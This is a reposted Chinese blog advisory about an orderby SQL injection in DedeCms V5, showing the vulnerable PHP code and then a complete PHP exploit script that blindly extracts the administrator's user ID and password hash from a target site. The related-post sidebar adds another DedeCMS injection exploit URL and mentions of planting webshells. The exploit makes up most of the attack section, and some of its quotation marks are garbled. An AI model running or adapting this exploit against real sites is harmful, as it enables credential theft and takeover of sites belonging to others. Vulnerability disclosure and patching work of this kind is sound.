dedecms注射漏洞

最新推荐文章于 2024-08-05 19:49:17 发布
转载 最新推荐文章于 2024-08-05 19:49:17 发布 · 506 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/jannock/archive/2008/08/14/1267513.html
文章标签:

#php #数据库

本文详细解析了DedeCms中存在的严重SQL注入漏洞,该漏洞允许恶意用户通过未过滤的参数控制整个网站,获取敏感信息如管理员密码等。文章提供了漏洞利用的测试代码及修复建议。
漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从 DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。

漏洞厂商:http://www.dedecms.com/

漏洞来源:http://www.80sec.com/release/dedecms-sql-injection.txt

漏洞解析:在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下

-------------------------------------------------------
if(empty($orderby)) $orderby = 'pubdate';

//重载列表
if($dopost=='getlist'){
PrintAjaxHead();
GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数
$dsql->Close();
exit();
……
function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){
global $cfg_phpurl,$cfg_ml;
$jobs = array();
$start = ($pageno-1) * $pagesize;

$dsql->SetQuery("Select * From #@__jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");
$dsql->Execute();//orderby 带入数据库查询
……
----------------------------------------------------------

漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档):

<?
print_r('
--------------------------------------------------------------------------------
DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit
BY Flyh4t
www.wolvez.org
Thx for all the members of W.S.T and my friend Oldjun
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].’ host path
host: target server (ip/hostname)
path: path to DEDEcms
Example:
php ‘.$argv[0].’ localhost /
——————————————————————————–
‘);
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),’80′);
if (!$ock) {
echo ‘No response from ‘.$host; die;
}
fputs($ock,$packet);
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix=”dede_”;
$cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;

if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/'))
{echo ‘Error… check the path!’; die;}

/*get $prefix*/
$packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (eregi(”in your SQL syntax”,$html))
{
$temp=explode(”From “,$html);
$temp2=explode(”member”,$temp[1]);
if($temp2[0])
$prefix=$temp2[0];
echo “[+]prefix -> “.$prefix.”\n”;
}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
echo “[~]exploting now,plz waiting\r\n”;

/*get password*/
$j=1;$password=”";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”\r\n”;break;}
}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

/*get userid*/
$j=1;$admin=”";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”\r\n”;break;}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

print_r(’
——————————————————————————–
[+]userid -> ‘.$admin.’
[+]pwd(md5 24位) -> ‘.$password.’
——————————————————————————–
‘);
function is_hash($hash)
{
if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo “Exploit succeeded…”;}
else {echo “Exploit failed…”;}
?>
本站内容均为原创,转载请务必保留署名与链接!
dedecms注射漏洞:http://www.80sec.com/dedecms-sql-injection.html

转载于:https://www.cnblogs.com/jannock/archive/2008/08/14/1267513.html

TOMMY201112
关注
Total.js CMS 命令注入漏洞复现
weixin_54787877的博客
03-17 532
0X01 漏洞概述 Total.js CMS是一套基于NoSQL数据库的内容管理系统(CMS)。 Total.js CMS 12.0.0版本中存在命令注入漏洞,攻击者可利用该漏洞执行非法命令。 0X02环境搭建 方法一:下载源码 https://my.totaljs.com/或者https://github.com/totaljs/cms Windows下安装npm 参考:https://blog.youkuaiyun.com/zhao1949/article/details/53907827..
织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞
weixin_42104947的博客
03-10 656
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.Hackme论坛原创 转载请附带原文链接作者: c4rp3nt3r@0x50sec.orgDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.算了不公开了,不能糟蹋0day了.传送门 DedeCmS V57 p...
CMS漏洞复现
qq_43613144的博客
07-20 6651
漏洞复现-啧啧啧
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
Seacms漏洞分析利用复现 By Assassin
热门推荐
Assassin
08-03 1万+
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
怎么提高dede程序安全性,安全需要删除哪些文件一下教你解决
秃头的博客
12-19 588
织梦系统数据库存储的密码是MD5的,一般HACK就算通过注入拿到了MD5的密码,如果你的密码够严谨,对方也逆转不过来。mail_file_manage.php、mail_getfile.php、mail_send.php、mail_title.php、mail_title_send.php、mail_type.ph 【邮件发送】不需要tag功能请将根目录下的tag.php删除。soft_add.php、soft_config.php、soft_edit.php 【软件下载类,存在安全隐患】
自用护w面试题
Zephyr_Misaka的博客
06-01 1226
21-FTP 看是否存在匿名访问22-SSH 看是否存在弱口令25-SMTP80-HTTP 常见web漏洞443-HTTPS openSSl心脏出血漏洞445-smb ms08-067、 ms17-0101433-mssql 弱口令1521-oracle, 弱口令3306-mysql 数据库的默认端口3389-windows远程桌面 弱口令7001-weblogic的默认端口 8080-tomcat漏洞应用层:为应用程序提供网络服务表示层:数据格式化、加密、解密会话层:建立、管理和维护会话连接传输层:建立
Web安全工程师成长路线
sanMu_blog的博客
06-24 9515
Web安全工程师 职位描述: 对公司网站、业务系统进行安全评估测试(黑盒、白盒测试);对公司各类系统进行安全加固;对公司安全事件进行响应,清理后门,根据日志分析攻击途径;安全技术研究,包括安全防范技术,黑客技术等;跟踪最新漏洞信息,进行业务产品的安全检查。 职位要求: 熟悉主流的Web安全技术,...
信息收集
qq_42980938的博客
10-28 5074
信息收集大全 google 语法  "" 双引号的内容不可拆分 site 指定域名 lnurl url存在的关键网页 lntext 网页正文中的关键字 Filetle 指定文件类型 lntitle 网页标题关键字 —————————————————————————————— 经常运用 搜索敏感文件 site:xxx.com filetype:doc intext:pass site:xxx.com...
CMS-GetShell漏洞复现
2401_86440467的博客
08-05 3375
使用虚拟机为centos7.6确保docker与docker-compose已安装(如果有需要或者有时间,会做一篇安装流程)下载靶场git clone https://github.com/vulhub/vulhub.git(我这里已经下载,不再演示)进入 /vulhub/wordpress/pwnscriptum 目录下;使用命令docker-compose up -d 开启环境如果启动失败,vim docker-compose.yml修改将上面改为2.1,下面为端口自己随便选择一个未占用即可。
【复现】常见CMS漏洞
m0_59151303的博客
08-04 1621
点击【应用】–》【 插件安装】–》【 上传文件】点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】
海洋cms v6.53 v6.54版本漏洞复现
weixin_30243533的博客
10-10 919
海洋cms v6.53 v6.54版本漏洞复现 参考链接: 今天发现freebuf上一篇海洋cms的漏洞,来复现一下。 http://www.freebuf.com/vuls/150042.html 漏洞原理: 文章里说的很清楚echoSearchPage函数中的content变量传给了parself函数,跟踪代码,找到./include/main.class.php,可以看到pars...
espcms5.7.13 sql注入漏洞复现
wanguixiu的博客
06-29 791
espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/control/citylist.php文件可以看到$sql = "select * from $db_table where parentid=$pa...
DEDECMS曝重大安全漏洞 百万网站受影响
darenkuke的博客
05-12 959
5月10日,达人酷IT研发安全中心发现国内著名建站工具DEDECMS(织梦系统)存在严重漏洞,黑客可以利用该漏洞获得此网站后台最高管理权限,从而窃取网站用户的个人帐号密码等私密信息或上传植入盗号木马病毒进行牟利。由于DEDECMS工具在国内使用率颇高,所以此次漏洞或将对国内百万网站产生威胁。目前腾讯电脑管家、360安全卫士已率先拦截利用该漏洞的钓鱼盗号网站,并通过达人酷官方网站提醒广大网站站长及时升级打上补丁,避免漏洞被利用。
织梦dedecms漏洞修复大全注入漏洞
unixtech的博客
12-21 3700
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天乐清网站建设的赵老师就为大家讲解一下如何修复任意文件上传漏洞与注入漏洞。任意文件上传漏洞修复包含一个文 DEDECMS|织梦|漏洞修复|
dedecms5.7注入和上传漏洞
weixin_34351321的博客
01-01 403
注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,   然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏...
dedecms5.7最新注入和上传漏洞
01-25 734
转自:http://www.sa666.com/thread-25247-1-1.html 发布时间:2012-4.26发布作者:佚名 漏洞类型:注入漏洞、上传漏洞 漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。   注入漏洞。首先访问“/data/admin/ver.t...
dedecms注入漏洞
aomi6689的博客
12-05 2989
版本:Powered byDedeCMSV57_GBK© 2004-2011DesDevInc. 漏洞利用EXP:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,...
dedecms漏洞安全加固
最新发布
02-28
### DedeCMS 安全漏洞概述 DedeCMS 作为一款广泛应用的内容管理系统 (CMS),尽管其设计科学合理且易于使用,但也面临着诸多安全挑战。常见的安全威胁包括但不限于 SQL 注入、XSS 跨站脚本攻击、CSRF 欺骗攻击以及远程代码执行等[^1]。 ### 常见的安全漏洞实例 对于早期版本的 DedeCMS 来说,确实存在一些严重的安全隐患。例如,某些版本允许未经验证的文件上传行为,这可能导致攻击者利用该特性向服务器植入恶意 WebShell 文件,从而获得对服务器的部分控制权。此外,还可能存在远程代码执行的风险,使得未经授权的操作得以实施[^3]。 ### 实施安全加固的最佳实践措施 为了有效提升基于 DedeCMS 构建网站的整体安全性,可以从以下几个方面着手: #### 更新至最新稳定版 确保所使用的 DedeCMS 版本是最新的官方发行版本,因为开发者通常会在新版本中修补已知的安全缺陷,并引入更严格的数据校验机制来抵御潜在风险。 #### 加强权限管理 调整默认设置中的用户角色与权限分配策略,遵循最小特权原则授予必要的访问级别;同时启用强制密码复杂度要求,增强账户认证环节的安全屏障[^2]。 #### 配置Web应用防火墙(WAF) 部署专业的 WAF 可以实时监测并阻止针对应用程序层发起的各种网络攻击尝试,如 SQL 注入、XSS 攻击等形式,为平台提供额外一层保护罩。 #### 对上传功能做严格的限制 修改文件上传路径配置项,使其指向非可解析目录之外的位置存储附件资料;另外还需加强对上传文件类型的白名单过滤逻辑,严禁任何可能含有危险指令集扩展名(比如 .php,.asp 等)进入系统内部环境。 ```bash # 修改 upload 目录权限为只读 chmod -R 555 /path/to/dedecms/upload/ ``` #### 日志审计与异常告警 开启详细的日志记录选项以便追踪可疑活动轨迹;建立自动化报警响应预案,在检测到异常登录请求或其他高危操作时能够及时通知管理员介入调查处理[^4]。 ### 结论 通过对上述各项举措的有效落实,可以在很大程度上改善运行于 DedeCMS 上线业务系统的抗御外部侵扰能力,保障数据资产免受非法侵害的同时也为用户提供更加可靠的服务体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值